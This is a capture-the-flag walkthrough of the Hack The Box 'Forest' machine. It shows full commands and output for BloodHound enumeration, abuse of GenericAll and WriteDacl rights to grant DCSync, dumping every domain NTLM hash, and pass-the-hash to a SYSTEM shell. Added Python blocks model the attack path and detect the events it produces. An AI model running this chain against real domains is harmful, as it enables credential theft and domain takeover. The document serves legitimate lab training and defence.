/usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1
/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
┌──(kali㉿aidenpearce369)-[~]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1 .
┌──(kali㉿aidenpearce369)-[~]
└─$ mkdir SMBShare
┌──(kali㉿aidenpearce369)-[~]
└─$ cp PowerUp.ps1 SMBShare/
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-smbserver MONISH SMBShare
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
...
Copying our script to a writable location,
*Evil-WinRM* PS C:\Users\svc-alfresco> copy \\10.10.14.4\MONISH\PowerUp.ps1 .
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
-a---- 3/27/2022 1:18 AM 563259 PowerUp.ps1
Running PowerUp.ps1 turned out to be useless, as it failed with privilege and WMI errors.
Running SharpHound
Let's try to gather information using SharpHound and load the output from the ingestor into BloodHound to analyse the shortest path.
Copying it to our target machine and running the ingestor,
*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe --collectionmethods All --domain htb.local --ldapUsername svc-alfresco --ldappassword s3rvice
2022-03-27T05:16:37.0031421-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:37.0656410-07:00|INFORMATION|Initializing SharpHound at 5:16 AM on 3/27/2022
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Loaded cache with stats: 120 ID to type mappings.
120 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-03-27T05:16:38.8781460-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-27T05:16:40.0500234-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-03-27T05:16:40.3000250-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-03-27T05:16:40.3000250-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-03-27T05:17:10.7534462-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 42 MB RAM
2022-03-27T05:17:24.6751174-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-03-27T05:17:24.7064451-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 46 MB RAM
2022-03-27T05:17:24.8939084-07:00|INFORMATION|Enumeration finished in 00:00:44.8591855
2022-03-27T05:17:25.0033515-07:00|INFORMATION|SharpHound Enumeration Completed at 5:17 AM on 3/27/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco> ls
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
-a---- 3/27/2022 5:17 AM 17775 20220327051724_BloodHound.zip
-a---- 3/27/2022 5:17 AM 19811 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 3/27/2022 1:18 AM 563259 PowerUp.ps1
-a---- 3/27/2022 3:51 AM 906752 SharpHound.exe
Let's copy the ingestor output to our local machine,
*Evil-WinRM* PS C:\Users\svc-alfresco> copy 20220327051724_BloodHound.zip \\10.10.14.4\MONISH\
Now analysing the BloodHound output,
These are the components shown on the home page; let's find the Domain Admins,
Let's analyse the shortest path from our owned principal to the Administrator of this domain,
But even if we PS-Remote to the machine, we could not dump hashes using mimikatz because of some compatibility issue.
Here Service Accounts is a member of Privileged IT Accounts.
And Privileged IT Accounts is in turn a member of Remote Management Users and Account Operators.
Through Remote Management Users we could add users to enable PS-Remoting, and we also have access over Account Operators.
If you look at this graph, the shortest path to Domain Admins can also go through the WriteDacl ACL that Exchange Windows Permissions holds, and we also have the GenericAll ACL over Exchange Windows Permissions from Account Operators.
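As an added example (not part of the writeup and not BloodHound's own code), the chain the graph shows can be reproduced with a small breadth-first search over the relationships described above; the edge list is constructed here from the writeup, HTB.LOCAL stands for the domain object that Exchange Windows Permissions holds WriteDacl over, and cut_edges reports which single group membership or ACE a defender would remove to break the whole path.

```python
from collections import deque

# Constructed from the relationships the BloodHound graph above shows for Forest:
# (source, edge type, target). Edge names follow BloodHound's conventions.
EDGES = [
    ("svc-alfresco", "MemberOf", "Service Accounts"),
    ("Service Accounts", "MemberOf", "Privileged IT Accounts"),
    ("Privileged IT Accounts", "MemberOf", "Remote Management Users"),
    ("Privileged IT Accounts", "MemberOf", "Account Operators"),
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "HTB.LOCAL"),
]


def build_graph(edges):
    """Adjacency list: node -> [(edge type, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph


def shortest_path(edges, start, goal):
    """Breadth-first search; returns [(src, rel, dst), ...] or None if unreachable."""
    graph = build_graph(edges)
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in parent:
        return None
    path, node = [], goal
    while parent[node] is not None:
        prev, rel = parent[node]
        path.append((prev, rel, node))
        node = prev
    path.reverse()
    return path


def format_path(path):
    """Render a path as 'a -[MemberOf]-> b -[GenericAll]-> c'."""
    text = path[0][0]
    for _, rel, dst in path:
        text += f" -[{rel}]-> {dst}"
    return text


def cut_edges(edges, start, goal):
    """Edges whose removal on its own makes goal unreachable from start.

    Each is a single remediation point: a membership or ACE that, if removed,
    breaks the chain. The Remote Management Users membership is not one,
    because the path to the domain object does not pass through it."""
    return [e for e in edges
            if shortest_path([x for x in edges if x != e], start, goal) is None]


if __name__ == "__main__":
    path = shortest_path(EDGES, "svc-alfresco", "HTB.LOCAL")
    print(format_path(path))
    for edge in cut_edges(EDGES, "svc-alfresco", "HTB.LOCAL"):
        print("single point of remediation:", edge)
```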

Privilege Escalation
We are already a member of the required groups,
*Evil-WinRM* PS C:\Users\svc-alfresco> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\Users\svc-alfresco>
Since we are already a member of the required groups, we just need to make use of the GenericAll to add a new user to Exchange Windows Permissions.
Creating a new user in the domain,
*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco> net user aidenpearce369 C@ntH4ckM3 /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net users /domain
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator aidenpearce369
andy DefaultAccount Guest
HealthMailbox0659cc1 HealthMailbox670628e HealthMailbox6ded678
HealthMailbox7108a4e HealthMailbox83d6781 HealthMailbox968e74d
HealthMailboxb01ac64 HealthMailboxc0a90c9 HealthMailboxc3d7722
HealthMailboxfc9daad HealthMailboxfd87238 krbtgt
lucinda mark santi
sebastien SM_1b41c9286325456bb SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb SM_681f53d4942840e18 SM_75a538d3025e4db9a
SM_7c96b981967141ebb SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco>
Now, using the GenericAll right, we add our new user to the target group Exchange Windows Permissions,
*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name Exchange Windows Permissions
Comment This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.
Members
-------------------------------------------------------------------------------
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions" /add aidenpearce369
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions"
Group name Exchange Windows Permissions
Comment This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.
Members
-------------------------------------------------------------------------------
aidenpearce369
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco>
Adding our new user to Remote Management Users as well, to enable PS-Remoting (WinRM) access,
*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
Privileged IT Accounts
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users" /add aidenpearce369
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
aidenpearce369
Privileged IT Accounts
The command completed successfully.
Switching to our new user,
┌──(kali㉿aidenpearce369)-[~/SMBShare]
└─$ evil-winrm -u aidenpearce369 -p C@ntH4ckM3 -i 10.10.10.161
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami
htb\aidenpearce369
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> hostname
FOREST
Let's use the WriteDacl ACL to grant DCSync rights to our new user.
First, crafting the credential object for our new user,
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> cd ..
*Evil-WinRM* PS C:\Users\aidenpearce369> $pass = convertto-securestring 'C@ntH4ckM3' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\aidenpearce369> $cred = New-Object System.Management.Automation.PSCredential ('HTB\aidenpearce369', $pass)
We need PowerView to write the DCSync ACL,
*Evil-WinRM* PS C:\Users\aidenpearce369> copy \\10.10.14.4\MONISH\PowerView.ps1 .
*Evil-WinRM* PS C:\Users\aidenpearce369> ls
Directory: C:\Users\aidenpearce369
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/16/2016 6:18 AM Desktop
d-r--- 3/27/2022 8:05 AM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
-a---- 3/27/2022 5:33 AM 770279 PowerView.ps1
*Evil-WinRM* PS C:\Users\aidenpearce369> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\aidenpearce369> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity aidenpearce369 -Rights DCSync
Now that the DCSync privilege is added to our new user, we can dump all the domain hashes with a DCSync attack, either remotely with impacket-secretsdump or locally on the target machine with mimikatz.
Let's dump the secrets using the DCSync permission of our new user,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-secretsdump aidenpearce369:C@ntH4ckM3@10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
aidenpearce369:9602:aad3b435b51404eeaad3b435b51404ee:0cb69e78807bb0bce38103060a3e4628:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:f6bec6f0744f874b2347f59f9267b449:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
[*] Cleaning up...
Now we have the NTLM hash of the Administrator.
Lateral Movement
Let's use the NTLM hash of the Administrator to perform a Pass-the-Hash attack.
Using psexec for the PTH attack,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file GxOgHmkQ.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service MMTl on 10.10.10.161.....
[*] Starting service MMTl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
FOREST
C:\Windows\system32> cd ../../
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>
C:\Users\Administrator\Desktop>
We can also use wmiexec and many other tools with the NTLM hash of the Administrator.
After dumping all the hashes, this amounts to a full domain takeover.
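Defensive counterpart to the DCSync grant and dump above and to the psexec service install in this section: an added example, not part of this writeup, with detection rules run over constructed, simplified Security/System event records (IDs 4720, 4728/4732/4756, 4662 and 7045). The field names are a simplified stand-in for the real EVTX schema and the service allowlist is assumed.

```python
import re

# Extended-right GUIDs a principal must hold on the domain head to DCSync (well known)
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Groups on this box whose membership changes should raise an alert
SENSITIVE_GROUPS = {"Exchange Windows Permissions", "Remote Management Users",
                    "Account Operators", "Domain Admins"}
KNOWN_SERVICES = {"wuauserv", "Spooler"}  # assumed allowlist for 7045; tune per estate
GROUP_ADD_EVENTS = {4728, 4732, 4756}      # member added to global / local / universal group

def is_machine_account(principal: str) -> bool:
    """Machine accounts (FOREST$, EXCH01$) end in '$'; DCs replicate as themselves."""
    return principal.split("\\")[-1].endswith("$")

def detect(events):
    """Return (rule, detail) alerts for a stream of simplified event dicts."""
    alerts, new_accounts = [], set()
    for e in events:
        eid = e["id"]
        if eid == 4720:  # user account created: remember it for later correlation
            new_accounts.add(e["target"].lower())
        elif eid in GROUP_ADD_EVENTS and e["group"] in SENSITIVE_GROUPS:
            who = "newly created account" if e["member"].lower() in new_accounts else "account"
            alerts.append(("sensitive-group-add",
                           f"{who} {e['member']} added to {e['group']} by {e['subject']}"))
        elif eid == 4662:  # operation on an AD object; GUIDs sit in the Properties field
            guids = set(re.findall(r"\{([0-9a-f-]{36})\}", e["properties"].lower()))
            if guids & REPLICATION_GUIDS and not is_machine_account(e["subject"]):
                alerts.append(("dcsync", f"replication rights used by {e['subject']}"))
        elif eid == 7045 and e["service"] not in KNOWN_SERVICES:  # psexec-style service
            alerts.append(("service-install", f"service {e['service']} -> {e['image']}"))
    return alerts

# Constructed sample stream mirroring the steps taken in this writeup
SAMPLE_EVENTS = [
    {"id": 4720, "subject": "HTB\\svc-alfresco", "target": "aidenpearce369"},
    {"id": 4756, "subject": "HTB\\svc-alfresco", "member": "aidenpearce369",
     "group": "Exchange Windows Permissions"},
    {"id": 4732, "subject": "HTB\\svc-alfresco", "member": "aidenpearce369",
     "group": "Remote Management Users"},
    {"id": 4662, "subject": "HTB\\FOREST$",  # the DC replicating normally: expected
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "subject": "HTB\\aidenpearce369",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 7045, "service": "MMTl", "image": "%SystemRoot%\\GxOgHmkQ.exe"},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Accounts that legitimately replicate without a trailing `$` (for example a directory sync service account) need an explicit allowlist in the 4662 rule, or they will fire as DCSync.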